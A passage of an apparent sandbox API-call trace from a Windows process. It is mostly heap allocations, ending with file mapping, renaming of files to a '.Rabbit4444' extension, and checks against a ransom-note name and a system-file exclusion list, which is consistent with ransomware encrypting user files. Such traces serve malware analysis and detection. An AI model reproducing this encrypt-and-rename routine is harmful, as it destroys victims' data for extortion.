(HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0070.086] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0070.087] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x115180 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0070.096] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105410 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x115390 [0070.096] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11d948 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11db58 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20c) returned 0x104770 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103cc8 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0070.096] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db58 | out: hHeap=0xe0000) returned 1 [0070.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x11db58 [0070.096] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103d58 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x1098e8 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103d58 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x204) returned 0x104988 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055d0 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055d0 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0070.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0070.097] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105430 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105430 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105420 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105420 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105530 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105530 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0070.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0070.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105490 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105490 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055d0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055d0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054c0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054c0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054d0 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054d0 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.099] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.099] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105570 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105570 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054b0 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054b0 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105550 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105550 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105410 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105410 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055a0 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055a0 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105580 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105580 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105560 [0070.100] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105560 | out: hHeap=0xe0000) returned 1 [0070.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105450 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105450 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1055c0 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055c0 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054e0 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054e0 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105510 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105510 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054a0 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054a0 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105480 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105480 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105520 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105520 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105540 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105540 | out: hHeap=0xe0000) returned 1 [0070.101] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105440 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105440 | out: hHeap=0xe0000) returned 1 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11db58 | out: hHeap=0xe0000) returned 1 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104770 | out: hHeap=0xe0000) returned 1 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104988 | out: hHeap=0xe0000) returned 1 [0070.101] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103cc8 | out: hHeap=0xe0000) returned 1 [0070.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0070.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0070.102] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16141249545) returned 1 [0070.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0070.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0070.102] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.102] CloseHandle (hObject=0x260) returned 1 [0070.102] CloseHandle (hObject=0x29c) returned 1 [0070.102] wsprintfW (in: param_1=0x11cc050, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.chk.Rabbit4444") returned 116 [0070.102] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.chk" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.chk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.chk.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.chk.rabbit4444"), dwFlags=0x1) returned 1 [0070.103] InterlockedExchangeAdd (in: Addend=0xff5a0, Value=8192 | out: Addend=0xff5a0) returned 0 [0070.103] InterlockedExchangeAdd (in: Addend=0xff5ac, Value=16 | out: Addend=0xff5ac) returned 0 [0070.103] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cdd70 | out: lpFindFileData=0x11cdd70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x323353b6, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x3235b602, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0xf4667269, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb.log", cAlternateFileName="")) returned 1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="Rabbit4444.exe") returned -1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2=".") returned 1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="..") returned 1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="windows") returned -1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="bootmgr") returned 1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="pagefile.sys") returned -1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="boot") returned 1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="ids.txt") returned -1 [0070.104] lstrcmpiW (lpString1="edb.log", lpString2="NTUSER.DAT") returned -1 [0070.104] lstrcpyW (in: lpString1=0x11ce984, lpString2="edb.log" | out: lpString1="edb.log") returned="edb.log" [0070.104] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log", dwFileAttributes=0x0) returned 1 [0070.352] lstrlenW (lpString="edb.log") returned 7 [0070.352] lstrlenW (lpString="Rabbit4444") returned 10 [0070.352] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0070.352] lstrlenW (lpString=".dll") returned 4 [0070.352] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0070.352] lstrlenW (lpString=".lnk") returned 4 [0070.352] lstrcmpiW (lpString1=".log", lpString2=".lnk") returned 1 [0070.353] lstrlenW (lpString=".ini") returned 4 [0070.353] lstrcmpiW (lpString1=".log", lpString2=".ini") returned 1 [0070.353] lstrlenW (lpString=".sys") returned 4 [0070.353] lstrcmpiW (lpString1=".log", lpString2=".sys") returned -1 [0070.353] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AppData\\Indexed DB\\edb.log" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\appdata\\indexed db\\edb.log"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.354] QueryPerformanceFrequency (in: lpFrequency=0x11cbd40 | out: lpFrequency=0x11cbd40*=100000000) returned 1 [0070.354] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd48 | out: lpPerformanceCount=0x11cbd48*=16166459272) returned 1 [0070.354] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x11cbda0 | out: lpFileSize=0x11cbda0*=524288) returned 1 [0070.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0070.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0070.354] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x27c [0070.355] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x2b0000 [0070.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b380 [0070.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0070.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0070.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0070.387] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0070.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0070.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0070.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0070.387] QueryPerformanceCounter (in: lpPerformanceCount=0x11cbd50 | out: lpPerformanceCount=0x11cbd50*=16169861120) returned 1 [0070.388] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: 